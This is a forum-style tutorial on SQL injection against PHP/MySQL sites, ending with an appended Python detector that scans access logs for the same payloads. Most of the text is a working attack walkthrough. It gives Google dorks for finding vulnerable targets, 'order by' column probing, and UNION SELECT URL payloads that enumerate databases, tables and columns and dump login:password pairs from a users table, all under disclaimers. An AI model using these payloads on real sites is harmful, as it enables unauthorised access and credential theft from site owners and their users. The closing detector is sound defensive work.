This is for educational purposes only. I am not responsible for your actions based on the content provided.
How to SQLI
Hey everyone! I'm Epic, and today I will be teaching you how to SQLI. I will do this in a question-and-answer format: I will start with a broad question at the beginning of every step and clarify the answer beneath it. I think this is the simplest, easiest way to teach you. I would like to state a few things: I have only attempted SQLI on websites I own and created; I do not recommend or encourage you to use this to "hack" websites that are not your own property and creation. This thread is meant for research and education purposes, not to supply or support hackers. I do not condone or support illegal hacking. I am not responsible for consequences should you partake in illegal hacking. I am not responsible for anyone who interprets this thread incorrectly and uses it for illegal hacking.
Now that we've gotten that out of the way, let's begin!
SOME THINGS TO REMEMBER WHILE READING THIS GUIDE
This is not the easiest method; there is an easier, less-involved method beneath, though some find this "completely on your own" method more satisfying. Anything within CODE tags represents the doing part of a step, the part where you will actually do/enter something (you may have to press Enter/Return so your browser loads the modified URL). The text and pictures help to keep you on track and explain what's going on.
What is SQLI?
SQLI stands for SQL Injection. What's SQL? It stands for Structured Query Language, a database language designed for managing data in relational database management systems (RDBMS). SQL Injection is when you "inject" your own SQL into the queries a website runs against its database (most people just call this hacking the site). Once that works you can read data you were never supposed to see, or insert your own data (some might call this defacing a website).
Okay, how do I start?
Well, you start by finding a "vuln host", as many tutorials describe it. Basically, you need to find a vulnerable website that will allow you to SQLI. Not all websites are vulnerable to SQLI; while all websites are at risk of some form of hacking, a site may be too secure and well coded to SQLI.
First off, you'll need "dorks". Here are a few dorks that you can use (although there are many more):
Code:
inurl:index.php?id=
inurl:news.php?id=
inurl:category.php?id=
inurl:games.php?id=
inurl:forum.php?tid=
inurl:newsletter.php?id=
inurl:content.php?id=
You saying I'm a dork? - Now what?
Let's say you're on this website:
Code:
http://site.com/news/view.php?id=828
How do I find the right number of columns?
You need to find the number of columns the page's query returns by appending an "order by" clause and raising the number until the page breaks. The last number that still loads normally is the column count (8 in this example):
Code:
http://site.com/news/view.php?id=828 order by 1-- (page loads normal)
http://site.com/news/view.php?id=828 order by 2-- (page loads normal)
http://site.com/news/view.php?id=828 order by 3-- (page loads normal)
http://site.com/news/view.php?id=828 order by 4-- (page loads normal)
http://site.com/news/view.php?id=828 order by 5-- (page loads normal)
http://site.com/news/view.php?id=828 order by 6-- (page loads normal)
http://site.com/news/view.php?id=828 order by 7-- (page loads normal)
http://site.com/news/view.php?id=828 order by 8-- (page loads normal)
http://site.com/news/view.php?id=828 order by 9-- (error)
Now that we know the query has 8 columns, we will use the "Union Select" command with one value per column (the id is negated so the real row disappears and only our row is shown):
Code:
http://site.com/news/view.php?id=-828 union select 1,2,3,4,5,6,7,8--
This should make the website show some of those numbers on the screen.
If it does, the website is definitely SQLI vulnerable and ready to hack. The number that appears tells you which column is displayed on the page; in this example it is column 3, which is why the 3 gets replaced in every payload below.
How do I get the MySQL version and current user?
Now we need to know the MySQL version. If it's 5 or above (hopefully it is) we'll be able to hack it, because MySQL 5 introduced the information_schema database that the later steps read table and column names from. If it's under 5 I STRONGLY urge you to find a different website; it will be difficult for beginners because you'll have to guess the tables and columns at random.
Code:
http://site.com/news/view.php?id=-828 union select 1,2,@@version,4,5,6,7,8--
To get the current user, enter this:
Code:
http://site.com/news/view.php?id=-828 union select 1,2,user(),4,5,6,7,8--
How do I get the Databases?
Now we want to find all the databases and the current database.
Here is the syntax for all databases:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(schema_name),4,5,6,7,8 from+information_schema.schemata--
Now we would like to know the current database. It's pretty obvious in this case, but it is useful sometimes.
Syntax for current database:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,database(),4,5,6,7,8
How do I get the tables?
Now we want to know the tables in the current database, and for this we will continue using "union select".
Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=database()--
From the data we have received we can now see which table the accounts and passwords should be stored in: it is usually called "users" or something that looks like that (on this example site it is "bpusers"). Write it down and move on.
How do I get columns?
Now we want to know the columns. This query lists the columns of every table in the current database, so look for the ones belonging to the table you wrote down.
Here is the code:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_schema=database()--
How do I finally get the account info? How do I dump user/pass?
Now you want to dump the logins and passwords from the users table, which on this example site is called bpusers:
Here is the code for that:
Code:
http://site.com/news/view.php?id=-828+UNION+SELECT+1,2,group_concat(login,0x3a,password,0x3a),4,5,6,7,8 from bpusers--
(NOTE: 0x3a is the hex code for ":", so it puts a colon between each login and password.)
Congratulations, you should have successfully completed an SQLI attack.
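For anyone running a site like the one above, the whole procedure leaves a recognisable trail in the web server's access log: an "order by N" probe that ends in an error, then UNION SELECT payloads reading information_schema. The following Python detector is an added example (not part of the original post); it parses constructed Common Log Format lines and flags each stage of the technique by its tokens.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not from the original post). Line 2 is the
# "order by 9" probe that errors, line 3 the table enumeration; 1 and 4 are benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news/view.php?id=828 HTTP/1.1" 200 5120
203.0.113.7 - - [10/Oct/2023:13:55:41 +0000] "GET /news/view.php?id=828%20order%20by%209-- HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2023:13:55:49 +0000] "GET /news/view.php?id=-828+UNION+SELECT+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 4870
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /news/view.php?id=829 HTTP/1.1" 200 5201
"""

# Common Log Format: client, identity, user, [timestamp], "METHOD target proto", status, bytes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each stage of the technique shown above leaves a recognisable token in the parameter value.
INDICATORS = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.", re.I)),
    ("comment_terminator", re.compile(r"(?:--|#)\s*$")),
]


def classify_value(value):
    """Return the list of indicator labels present in one decoded parameter value."""
    reasons = [label for label, rx in INDICATORS if rx.search(value)]
    # Payloads negate the numeric id so the real row disappears and the UNION row shows.
    if re.match(r"^-\d+\s", value):
        reasons.append("negated_numeric_id")
    return reasons


def scan_log(text):
    """Return one dict per request whose query string carries injection indicators."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes and turns '+' into spaces, matching what the database saw.
        for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                hits.append({"ip": m["ip"], "status": m["status"], "param": name, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 500 response on an "order_by_probe" hit followed by "union_select" hits from the same client is the sequence described in this guide; note that only GET parameters show up in access logs, so payloads sent in POST bodies need application-level logging or a WAF to catch.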